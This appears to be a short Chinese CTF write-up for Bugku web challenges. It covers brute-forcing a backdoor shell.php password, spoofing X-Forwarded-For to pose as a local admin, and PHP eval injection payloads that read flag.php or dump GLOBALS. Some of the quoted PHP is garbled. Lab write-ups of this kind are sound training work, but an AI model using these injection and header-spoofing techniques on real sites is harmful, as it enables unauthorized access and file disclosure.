bugku ctf

简介: bugku ctf练习平台

bugku ctf

game1

描  述: game1

网站被黑

WEB

描  述: 网站被黑了 黑客会不会留下后门

第一步扫目录 shell.php路径

第二部 pass密码1111抓包爆破

得到hacker

flag{94ec3a0b6b2ecb817a0fb5018f1b211e}

本地管理员

WEB

描  述: 本地管理员

直接admin test123会提示IP禁止访问,请联系本地管理员登陆,IP已�

请求包添加

X-Forwarded-For:127.0.0.1

eval

描  述: eval

<?php
    include "flag.php";
    $a = @$_REQUEST['hello'];
    eval( "var_dump($a);");
    show_source(__FILE__);
?>
http://x.x.x.x:13063/?hello=file("flag.php")

变量1

WEB

描  述: 题目变量1

$a=b
$b=c
echo $$a
这时候会输出c
GLOBALS:一个包含了全部变量的全局组合数组。变量的名字就是数组的键。
flag In the variable!
<? php 
error_reporting(0); //关闭php错误显示
include "flagl. php"; //引入flag1.php文件代码
highlight_file(file); 
if(isset($_GET[' args'])){//通过get方式传递 args变量才能执行if里面的代码
    $args =$_GET[' args']; 
    if(! preg_match("/\w+$/", Sargs)){//用正则表达式判断$args值,是否为任意大小写字母和0到9以及下划线组成,不是就打印"args error!";是执行var_dump($$args)。
      die("args error!"); 
    }
    eval("var_dump(SSargs);");
}
?>

?args=GLOBALS

头等舱

WEB

描  述: 头等舱

打开网页什么也没有

使用burp

相关文章
|
安全 网络安全
网络安全CTF比赛有哪些事?——《CTF那些事儿》告诉你
网络安全CTF比赛有哪些事?——《CTF那些事儿》告诉你
|
7月前
|
安全 Java PHP
CTF中的一些做题姿势
该文主要讨论了版本控制漏洞,提到了 `.git`, `.svn`, `.hg`, `CVS` 和 `.bzr` 等版本控制系统可能导致的源代码泄露。另外,文章指出压缩文件如 `.rar`, `.zip` 等如果备份在Web目录下,可能被攻击者下载。`.DS_Store` 文件和 `.filename.swp` (vim的临时文件)也可能泄漏敏感信息。域名的`txt`记录、`tz.php`探针和`phpinfo()`函数的滥用可暴露服务器详情。文中还探讨了多种绕过过滤的策略,并举例说明了如何利用`PHP`构造payload来执行命令或读取文件,强调了POST请求可能规避某些过滤限制。
72 0
|
7月前
|
SQL 网络安全 PHP
【网络安全 | CTF】FlatScience
【网络安全 | CTF】FlatScience
56 0
|
Shell PHP 数据安全/隐私保护
Bugku CTF 矛盾 网站被黑
Bugku CTF 矛盾 网站被黑
69 0
|
安全 PHP 开发工具
CTF入门学习笔记
CTF入门学习笔记
145 0
|
SQL 安全 Shell
CTF——常见题型
CTF——常见题型
243 0
|
Shell Perl
CTF真题 | [HITCON 2017]SSRFme
CTF真题 | [HITCON 2017]SSRFme
339 0
|
缓存 数据安全/隐私保护 C++
两道挺有意思的 CTF 题
两道挺有意思的 CTF 题
|
前端开发 JavaScript PHP
CTF_从入门到失业
CTF_从入门到失业
CTF_从入门到失业
|
JavaScript 前端开发 PHP
bukku ctf(刷题2)
bukku ctf 练习平台
361 0
bukku ctf(刷题2)